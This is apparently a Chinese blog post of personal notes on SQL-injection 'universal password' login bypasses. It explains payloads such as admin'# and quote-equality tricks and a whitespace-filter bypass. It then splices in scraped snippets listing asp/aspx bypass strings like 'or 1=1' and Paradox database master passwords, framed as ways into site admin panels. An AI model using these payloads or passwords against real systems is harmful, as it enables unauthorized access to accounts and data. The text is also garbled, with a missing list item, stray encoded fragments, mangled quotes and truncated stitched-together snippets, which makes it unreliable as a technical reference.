以下是我在學習sql注入時的一些感想分享,希望能幫助到大家,如有錯誤,望指出。
萬能密碼的種類:
①select * from admin where username =「」 and password = 「」
②admin『 #
④0⑤aaa』 = 『
在以下的select語句中的username和password可類似看作為字串變數
select * from user where username = 『admin』 and password = 『yi』;
該語句的判斷邏輯是什麼呢?
就是當username =『admin』和password=』yi』都為真時執行成功。
那麼就是說不管怎麼樣,只要這兩項都為真就行了,這就意味著即使使用者名稱和密碼都不正確,只要讓這兩項都為真就能執行成功,該邏輯就是②③條的注入原理
②select * from user where username = 『 『+』 『 and password = 『 『+』 『;(有侷限)
僅對於username和password的值為非數字開頭的字串有效。eg:』q123』
在這裡select語句中的username和password可類似看作為字串變數,那麼等於非數字開頭字串的變數在轉化為int形式時就為0(這裡的=號不是賦值符號,就是數學上=號的作用)
在這裡username和password可類似看作為字串變數,那麼非數字開頭的字串在轉化為int形式就為0(和③原理一樣,就是表現手法不同而已)
select 『aaa』=』a』;(執行結果為0)
判斷邏輯:username=』aaa』為假,假=』 『又變為了真,password一樣(前提username與password都不為』aaa』)%e6%b5%85%e6%98%93%e6%b7%b1
⑤select \nfrom user;(執行成功,在n與from之間沒空格)
select 1from;(執行失敗,因為1與from之間沒空格)
select 1,2,\nfrom user;(執行成功,在2與from之間沒空格)
該技巧在from的左端不能輸空格的時候,可以考慮能不能使用該方法進行繞過。
萬能密碼 php,PHP萬能密碼
說實話如果乙個 的前台都是注入漏洞,那麼憑經驗,萬能密碼進後台的機率基本上是百分之百。可是有的人說對php的站如果是gpc魔術轉換開啟,就會對特殊符號轉義,就徹底杜絕了php注入。其實說這話的人沒有好好想過,更沒有嘗試過用萬能密碼進php的後台。其實gpc魔術轉換是否開啟對用萬能密碼進後台一點影響也...
asp aspx php jsp萬能密碼
asp aspx萬能密碼 1 or a a 2 or a a 3 or 1 1 4 or 1 1 5 a or 1 1 6 or 1 1 7 or a a 8 or a a 9 or 10 or or 11 1 or 1 1 1 12 1 or 1 1 or 1 1 13 or 1 1 00 14 ...
PARADOX DB 萬能密碼
paradox資料庫的萬能密碼 如果是paradox,請用此萬能密碼 jiggae 還有 nx66ppx 注意大小寫 version password paradox 7 jiggae or cupcdvum paradox 5 jiggae or cupcdvum paradox 4 nx66pp...